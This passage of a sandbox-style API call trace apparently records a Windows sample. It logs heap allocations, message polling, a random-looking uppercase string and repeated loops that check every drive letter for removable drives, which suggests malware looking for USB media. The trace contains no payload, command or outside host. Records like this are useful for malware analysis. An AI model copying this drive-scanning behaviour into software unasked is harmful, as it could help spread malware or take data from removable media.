(HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0209.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0209.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0209.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0209.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0209.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0209.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0209.962] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0209.962] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0209.963] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0209.963] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0209.963] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0209.963] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0209.963] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0209.963] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0209.964] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0209.964] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0209.964] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0209.964] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0209.965] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0209.965] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0209.965] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0209.965] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0209.965] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0209.966] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0209.966] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0209.966] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0209.966] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0209.966] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0209.966] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0209.967] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0209.967] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0209.967] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0209.967] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0209.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0209.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0209.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0209.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0209.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0209.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0209.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0209.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0209.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0209.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0209.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0209.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0209.968] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0209.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0209.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0209.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325de0 [0209.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0209.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0209.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0209.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0209.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325de0 | out: hHeap=0x12c0000) returned 1 [0209.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0209.968] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0209.968] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0209.969] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0209.969] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0209.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0209.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0209.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0209.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0209.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0209.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0209.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0209.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0209.969] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.969] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0209.969] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.969] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0209.969] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0209.969] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0209.970] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0209.970] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0209.970] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.970] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0209.970] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0209.970] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0209.970] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0209.970] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0209.970] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0209.971] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0209.971] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0209.971] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0209.971] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0209.971] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0209.972] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0209.972] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0209.972] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0209.972] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0209.972] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0209.973] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0209.973] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0209.973] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0209.973] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0209.973] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0209.973] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0209.974] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0209.974] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0209.974] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0209.974] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0209.974] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0209.975] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0209.975] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0209.975] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0209.975] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0209.975] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0209.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0209.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0209.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0209.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0209.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0209.976] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0209.976] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0209.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0209.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0209.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0209.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0209.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0209.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0209.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0209.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0209.976] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0209.977] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.977] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0209.977] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0209.977] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0209.977] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.977] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0209.977] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0209.977] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0209.977] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0209.978] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0209.978] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0209.978] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0209.978] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0209.978] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0209.978] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0209.979] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0209.979] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0209.979] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0209.979] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0209.979] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0209.979] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0209.980] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0209.980] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0209.980] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0209.980] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0209.980] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0209.981] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0209.981] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0209.981] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0209.981] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0209.981] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0209.982] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0209.982] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0209.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0209.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0209.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0209.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0209.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0209.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0209.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0209.982] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0209.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0209.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0209.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0209.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0209.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0209.983] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0209.983] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0209.983] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0209.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0209.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0209.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0209.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0209.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0209.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0209.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0209.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0209.983] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.983] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0209.984] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0209.984] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0209.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0209.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0209.984] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0209.984] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0209.984] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0209.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0209.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0209.984] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0209.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0209.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0209.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0209.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0209.984] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0209.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0209.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0209.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0209.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0209.984] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0209.984] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0209.985] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0209.985] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0209.985] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0209.985] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0209.985] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0209.986] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0209.986] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0209.988] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0209.988] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0209.988] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0209.988] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0209.988] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0209.989] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0209.990] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0209.990] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0209.990] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0209.990] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0209.990] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0209.991] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0209.991] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0209.991] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0209.991] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0209.991] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0209.991] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0209.992] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0209.992] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0209.992] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0209.992] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0209.992] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0209.992] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0209.992] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0209.992] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0209.992] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0209.992] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0209.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0209.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0209.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0209.994] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0209.994] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0209.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0209.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0209.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0209.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0209.994] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0209.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0209.994] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0209.994] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0209.994] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0209.994] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0209.995] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0209.995] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0209.995] PeekMessageW (in: 